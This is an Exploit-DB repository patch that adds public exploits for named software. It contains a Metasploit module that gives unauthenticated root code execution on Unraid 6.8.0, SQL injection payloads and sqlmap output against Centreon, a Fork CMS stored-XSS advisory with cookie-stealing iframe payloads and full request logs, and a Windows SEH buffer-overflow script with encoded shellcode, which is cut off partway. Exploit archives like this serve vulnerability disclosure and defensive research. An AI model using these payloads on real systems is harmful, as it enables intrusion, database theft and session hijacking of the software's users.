From 01900f216d27957107cc84a3fcbd5f5a6a28b735 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 21 Apr 2020 05:01:47 +0000
Subject: [PATCH] DB: 2020-04-21

7 changes to exploits/shellcodes

Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)
Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path

Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)
Centreon 19.10.5 - 'id' SQL Injection
Fork CMS 5.8.0 - Persistent Cross-Site Scripting
---
 exploits/linux/remote/48353.rb   | 101 +++++++
 exploits/php/webapps/48345.txt   |  69 +++++
 exploits/php/webapps/48348.txt   | 491 +++++++++++++++++++++++++++++++
 exploits/windows/local/48346.py  |  97 ++++++
 exploits/windows/local/48350.py  | 108 +++++++
 exploits/windows/local/48351.py  |  54 ++++
 exploits/windows/local/48352.txt |  28 ++
 files_exploits.csv               |   7 +
 8 files changed, 955 insertions(+)
 create mode 100755 exploits/linux/remote/48353.rb
 create mode 100644 exploits/php/webapps/48345.txt
 create mode 100644 exploits/php/webapps/48348.txt
 create mode 100755 exploits/windows/local/48346.py
 create mode 100755 exploits/windows/local/48350.py
 create mode 100755 exploits/windows/local/48351.py
 create mode 100644 exploits/windows/local/48352.txt

diff --git a/exploits/linux/remote/48353.rb b/exploits/linux/remote/48353.rb
new file mode 100755
index 000000000..55f048b35
--- /dev/null
+++ b/exploits/linux/remote/48353.rb
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
+        'Description' => %q{
+          This module exploits two vulnerabilities affecting Unraid 6.8.0.
+          An authentication bypass is used to gain access to the administrative
+          interface, and an insecure use of the extract PHP function can be abused
+          for arbitrary code execution as root.
+        },
+        'Author' =>
+          [
+            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
+          ],
+        'References' =>
+          [
+            [ 'CVE', '2020-5847' ],
+            [ 'CVE', '2020-5849' ],
+            [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
+            [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
+          ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['php'],
+        'Privileged' => true,
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            [ 'Automatic', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Feb 10 2020'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+      'method' => 'GET'
+    )
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200
+      return CheckCode::Safe('Unexpected reply')
+    end
+
+    /\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})&nbsp;/ =~ res.body
+
+    if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
+      return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    begin
+      vprint_status('Sending exploit code')
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+        'method' => 'GET',
+        'encode_params' => false,
+        'vars_get' =>
+        {
+          'path' => 'x',
+          'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
+        }
+      )
+
+      if res.nil?
+        print_good('Request timed out, OK if running a non-forking/blocking payload...')
+      elsif res.code == 302
+        fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
+      else
+        print_warning("Unexpected response code #{res.code}, please check your payload.")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt
new file mode 100644
index 000000000..6a9c7ba07
--- /dev/null
+++ b/exploits/php/webapps/48345.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
+# Date: 2020-04-19
+# Exploit Author: Basim alabdullah
+# Vendor Homepage: https://www.centreon.com
+# Software Link: https://download.centreon.com/
+# Version: v.19.10.5
+# Tested on: Centos 5
+
+
+[EXECUTIVE SUMMARY]
+
+ Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.
+
+ Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
+ Downloaded by hundreds and thousands of IT professionals worldwide.
+ The analysis discovered a time-based blind SQL
+ injection vulnerability in the tracker functionality of
+ Centreon Monitoring software. A malicious user can inject arbitrary
+ SQL commands to the application. The vulnerability lies in the project tracker
+ service search functionality; depending on project visibility successful
+ exploitation may require user authentication. A successful attack
+ can read, modify or delete data from the database or execute arbitrary commands on the underlying system.
+
+[VULNERABLE VERSIONS]
+
+ The following version of the Centreon Monitoring was affected by the
+ vulnerability; previous versions may be vulnerable as well:
+ - Centreon version 19.10.5
+ 
+ 
+[Proof of Concept]
+ 
+ http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23
+ 
+ 
+ [Payloads]
+ 
+  Parameter: svc_id (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+    Payload: hid=15&svc_id=1 OR NOT 5782=5782
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 5 columns
+    Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
+---
+[12:24:35] [INFO] testing MySQL
+[12:24:35] [INFO] confirming MySQL
+[12:24:35] [INFO] the back-end DBMS is MySQL
+[12:24:35] [INFO] fetching banner
+web server operating system: Linux Red Hat
+web application technology: Apache 2.4.34, PHP 7.2.24
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+banner: '10.1.38-MariaDB'
+[12:24:35] [INFO] fetching database names
+[12:24:35] [INFO] starting 4 threads
+[12:24:35] [INFO] resumed: 'centreon'
+[12:24:35] [INFO] resumed: 'test'
+[12:24:35] [INFO] resumed: 'centreon_storage'
+[12:24:35] [INFO] resumed: 'information_schema'
+available databases [4]:                                                                                                                                                               
+[*] centreon
+[*] centreon_storage
+[*] information_schema
+[*] test
\ No newline at end of file
diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt
new file mode 100644
index 000000000..64d991ee6
--- /dev/null
+++ b/exploits/php/webapps/48348.txt
@@ -0,0 +1,491 @@
+# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: https://www.fork-cms.com/download
+# Software Link: https://github.com/forkcms/forkcms/pull/3073
+# CVE: N/A
+
+Document Title:
+===============
+Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2208
+
+ID (3073):  https://github.com/forkcms/forkcms/pull/3073
+
+
+Release Date:
+=============
+2020-04-17
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2208
+
+
+Common Vulnerability Scoring System:
+====================================
+5.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Fork is an easy to use open source CMS using Symfony Components. Fork
+CMS is dedicated to creating a user friendly environment
+to build, monitor and
+update your website. We take great pride in being the Content Management
+System of choice for beginners and professionals.
+
+(Copy of the Homepage: https://www.fork-cms.com  &
+https://www.fork-cms.com/download )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent web vulnerabilities in the official Fork CMS v5.8.0.
+
+
+Affected Product(s):
+====================
+ForkCMS
+Product: Fork CMS v5.8.0 - Content Management System (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-17: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities has been
+discovered in the official Fork CMS v5.8.0 open-source web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent input validation web vulnerabilities are located in the
+`Displayname` input field when using the `Add`, `Edit` or `Register`
+mechanism that forwards the information into the `var` parameter. Remote
+attackers and privileged application user accounts are able to
+inject own malicious persistent script code as the users displayname by
+usage of the registration module (/profiles/register). Privileged
+users with access to the profile or users module are able to exploit the
+issue by a simple inject. The displayname then becomes visible in
+the Admin - Profiles Index on Preview, Edit User/Profile, Delete User
+Interaction and User Index in Listing modules. the var parameter
+does not encode or parse the exisiting injected content and executes it.
+The request method to inject is POST and the attack vector of the
+vulnerability is located on the application-side of the content
+management system. The injection point is located in the registration form
+and the add/edit user function. The execution point of the issue occurs
+in the preview profile, edit user, user index listing and delete
+user message context.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Register
+[+] Add User
+[+] Edit User
+
+Vulnerable Input(s):
+[+] Displayname
+
+Vulnerable Parameter(s):
+[+] var
+
+Affected Module(s):
+[+] Preview Profile
+[+] Edit User
+[+] User Index
+[+] Delete User
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information an steüs below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the fork cms web-application newst version
+2. Move via sitemap or by link to the registration page
+(/modules/profiles/register)
+3. Inject your script code payload html/js to the Displayname input field
+4. Register the account by pushing submit
+5. Activate the link in the account registration email
+Note: Now simple wait until the administrator / privileged user visits
+the panel to execute the code on interaction or preview only
+6. Successful reproduce of the persistent script code injection
+vulnerability!
+
+
+PoC: Vulnerable Source (User Index in Listing -
+https://fork-cms.localhost:8080/private/en/users/index)
+<tr id="row-2" class="even">
+<td class="nickname"><a
+href="/private/en/users/edit?token=k7byefqor8&id=2"
+title="edit">test3"><iframe src="evil.source"
+onload=alert(document.cookie)></a></td>
+<td  class="fork-data-grid-action actionEdit"><a
+href="/private/en/users/edit?token=k7byefqor8&id=2"
+class="btn btn-default btn-xs pull-right">
+<span class="fa fa-pencil" aria-hidden="true"></span>&nbsp;Edit</a></td>
+</tr>
+
+
+PoC: Vulnerable Source (Profiles Index on Preview -
+https://fork-cms.localhost:8080/private/en/profiles/index)
+<tbody><tr id="row-1" class="odd">
+<td class="check"><input type="checkbox" name="id[]" value="1"
+class="inputCheckbox checkBeforeUnload"></td>
+<td class="email"><a
+href="/private/en/profiles/edit?token=k7byefqor8&id=1"
+title="">tester23@protonmail.com</a></td>
+<td class="display_name">"<iframe src="evil.source"
+onload="alert(document.cookie)"></td>
+<td  class="registered_on">13 April 2020 11:17</td>
+<td  class="fork-data-grid-action actionEdit">
+<a href="/private/en/profiles/edit?token=k7byefqor8&id=1" class="btn
+btn-default btn-xs pull-right">
+<span class="fa fa-pencil" aria-hidden="true"></span>&nbsp;Edit</a></td>
+</tr></tbody>
+
+
+PoC: Vulnerable Source (Delete User - On Interaction)
+<form name="delete" method="post"
+action="/private/en/users/delete?token=k7byefqor8">
+<input type="hidden" id="delete__token" name="delete[_token]"
+value="q3ADogMObka_-73n5afnMPsJHj9ZAI_ch5uiabqDsqs" />
+<input type="hidden" id="delete_id" name="delete[id]" value="2" />
+<div class="modal fade" id="confirmDelete" role="dialog" tabindex="-1"
+aria-hidden="true" aria-labelledby="confirmDeleteTitle">
+<div class="modal-dialog"><div class="modal-content"><div
+class="modal-header">
+<h4 class="modal-title" id="confirmDeleteTitle">Delete</h4></div>
+<div class="modal-body">
+<p>Are your sure you want to delete the user "evil.source"><iframe
+src=evil.source onload=alert(document.cookie)>"?</p></div>
+<div class="modal-footer">
+<button class="btn btn-default" title="Cancel"  data-dismiss="modal">
+<span class="fa fa-times" aria-hidden="true"></span>
+<span class="btn-text">Cancel</span></button>
+<button class="btn btn-danger" title="Delete" >
+<span class="fa fa-trash" aria-hidden="true"></span>
+<span class="btn-text">Delete</span>
+</button></div></div></div></div>
+</form>
+
+
+--- PoC Session Logs [POST] (Registration User Account) ---
+https://fork-cms.localhost:8080/en/modules/profiles/register#registerForm
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://fork-cms.localhost:8080/en/modules/profiles/register
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 179
+Origin: https://fork-cms.localhost:8080
+Connection: keep-alive
+Cookie:
+track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B;PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d;
+
+interface_language=en; frontend_language=en; cookie_bar_agree=Y;
+cookie_bar_hide=Y;
+form=register&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&display_name=>"<iframe
+src=evil.source
+onload=alert(document.cookie)>&email=tester23@protonmail.com&password=pwnd
+-
+POST: HTTP/1.1 302 Found
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: frontend_language=en; expires=Wed, 13-May-2020 09:49:57 GMT;
+Max-Age=2592000;
+path=/; domain=.fork-cms.localhost:8080; httponly; samesite=lax
+track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B; expires=Tue,
+13-Apr-2021 09:49:57 GMT;
+Max-Age=31536000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Location: https://fork-cms.localhost:8080
+X-server: fork01
+
+
+-- PoC Session Logs [POST] (Add User) ---
+https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
+Content-Type: multipart/form-data;
+boundary=---------------------------56051791419552543783889366402
+Content-Length: 2545
+Origin: https://fork-cms.localhost:8080
+Connection: keep-alive
+Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
+Upgrade-Insecure-Requests: 1
+form=add&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=tester232323@protonmail.com&password=tester445
+&confirm_password=tester445&name=test1&surname=test2&nickname=test3>"<iframe
+src=a onload=alert(document.cookie)>&avatar=
+&interface_language=en&preferred_editor=ck-editor&date_format=j F
+Y&time_format=H:i&number_format=dot_nothing
+&csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&add=
+-
+POST: HTTP/1.1 302 Found
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
+GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Location:
+/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
+src=evil.source onload=alert(document.cookie)>&highlight=row-4
+X-server: fork01
+-
+https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
+src=evil.source onload=alert(document.cookie)>&highlight=row-4
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
+Connection: keep-alive
+Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
+-
+POST: HTTP/1.1 200 OK
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Content-Length: 3615
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
+GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Vary: Accept-Encoding
+Content-Encoding: gzip
+X-server: fork01
+-
+GET: HTTP/1.1 200 OK
+Server: nginx/1.6.2
+https://fork-cms.localhost:8080/private/en/users/evil.source
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
+GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Location: /private/en/error?type=action-not-allowed
+X-server: fork01
+
+
+-- PoC Session Logs [POST] (Edit User) ---
+https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
+Content-Type: multipart/form-data;
+boundary=---------------------------388544425912514902093103180709
+Content-Length: 2563
+Origin: https://fork-cms.localhost:8080
+Connection: keep-alive
+Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
+form=edit&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=testemail337@protonmail.com&name=test1&surname=test2
+&nickname=test3>"<iframe src=evil.source
+onload=alert(document.cookie)>&avatar=&new_password=&confirm_password=
+&interface_language=en&preferred_editor=ck-editor&date_format=j F
+Y&time_format=H:i&number_format=dot_nothing&
+csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&edit=
+-
+POST: HTTP/1.1 302 Found
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55
+GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Location:
+/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe src=evil.source
+onload=alert(document.cookie)>&highlight=row-2
+X-server: fork01
+https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe
+src=evil.source onload=alert(document.cookie)>&highlight=row-2
+Host: fork-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer:
+https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
+Connection: keep-alive
+Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
+-
+POST: HTTP/1.1 200 OK
+Server: nginx/1.6.2
+Content-Type: text/html; charset=UTF-8
+Content-Length: 3585
+Connection: keep-alive
+Cache-Control: max-age=0, must-revalidate, private
+Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55 GMT;
+Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
+samesite=lax
+Vary: Accept-Encoding
+Content-Encoding: gzip
+X-server: fork01
+
+
+Reference(s):
+https://fork-cms.localhost:8080/en/modules/profiles/register
+https://fork-cms.localhost:8080/private/en/profiles/index
+https://fork-cms.localhost:8080/private/en/users/index
+https://fork-cms.localhost:8080/private/en/users/edit
+https://fork-cms.localhost:8080/private/en/users/add
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerabilities
+in the fork cms web-application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/windows/local/48346.py b/exploits/windows/local/48346.py
new file mode 100755
index 000000000..b80cee14b
--- /dev/null
+++ b/exploits/windows/local/48346.py
@@ -0,0 +1,97 @@
+# Exploit Title: Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)
+# Exploit Author: Bobby Cooke
+# Date: 2020-04-17
+# Vendor: Drive Software Company
+# Vendor Site: http://www.drive-software.com
+# Software Download: http://www.drive-software.com/download/ataclock.exe
+# Tested On: Windows 10 - Pro 1909 (x86)
+# Version: Atomic Alarm Clock 6.3 beta
+# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer
+
+File    = 'poc.txt'
+
+os_nSEH = '\x41'*(461)
+nSEH    = '\xeb\x05'   # jmp short +2
+SEH     = '\x47\x47'   # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe] 
+#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False 
+
+getPC   = '\x73'   # add [ebx], dh   # nop | [EBX] = writable memory 
+getPC  += '\x61'   # popad           # [ESP] = &Payload
+getPC  += '\x72'   # add [edx], dh   # realigns execution for 1 byte opcodes
+
+ebx2eax  = '\x58'  # pop eax         # EAX = &Payload
+ebx2eax += '\x72'  # add [edx], dh
+
+# Ajust EAX to &Decoder
+getDecoder  = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
+getDecoder += '\x72'         # add [edx], dh
+getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
+getDecoder += '\x72'         # add [edx], dh
+getDecoder += '\x50'         # push eax            # [ESP] = &Decoder
+getDecoder += '\x72'         # add [edx], dh
+
+#DecoderHex  = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' 
+firstHalf   = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' 
+## 2nd byte - \x00 => \x5F
+venBlinds   = '\x40\x72\xC6\x5F\x72\x40\x72\x40\x72'         
+## 4th byte - \x00 => \x33
+venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'         
+## 6th byte - \x00 => \x33
+venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'         
+## 8th byte - \x00 => \x66
+venBlinds  += '\xC6\x66\x72\x40\x72\x40\x72'         
+## 10th byte - \x00 => \x10
+venBlinds  += '\xC6\x10\x72\x40\x72\x40\x72'         
+## 12th byte - \x00 => \x33
+venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'         
+## 14th byte - \x00 => \x42
+venBlinds  += '\xC6\x42\x72\x40\x72\x40\x72'         
+## 16th byte - \x00 => \x32
+venBlinds  += '\xC6\x32\x72\x40\x72\x40\x72'         
+## 18th byte - \x00 => \x02
+venBlinds  += '\xC6\x02\x72\x40\x72\x40\x72'         
+## 20th byte - \x00 => \x10
+venBlinds  += '\xC6\x10\x72\x40\x72\x40\x72'         
+## 22nd byte - \x00 => \x3F
+venBlinds  += '\xC6\x3F\x72\x40\x72\x40\x72'         
+## 24nd byte - \x00 => \x1F
+venBlinds  += '\xC6\x1F\x72\x40\x72\x40\x72'         
+## 26th byte - \x00 => \x49
+venBlinds  += '\xC6\x49\x72\x40\x72\x40\x72'         
+## 28th byte - \x00 => \x02
+venBlinds  += '\xC6\x02\x72\x40\x72\x40\x72'         
+## 30th byte - \x00 => \xED
+venBlinds  += '\xC6\xED\x72\x40\x72\x40\x72'         
+## 32nd byte - \x00 => \xC3
+venBlinds  += '\xC6\xC3\x72\x40\x72'         
+# Jump to the decoded decoder by Returning to the address we saved on the stack
+venBlinds  += '\xC3'         #   ret  [!] Now we are executing the decoder!
+
+os_decoder   = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))
+
+# Custom PopCalc shellcode that avoids the bad characters
+fKernel32  = '\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C\xAD\x50\x5E\xAD\xFF\x70\x08'
+
+gExpotTbl  = '\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57'
+
+fWinExec   = '\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB\x03\x1A\x03\x5C\x24\x0C'
+
+# Call WinExec( CmdLine, ShowState );
+#   CmdLine   = "calc.exe"
+#   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
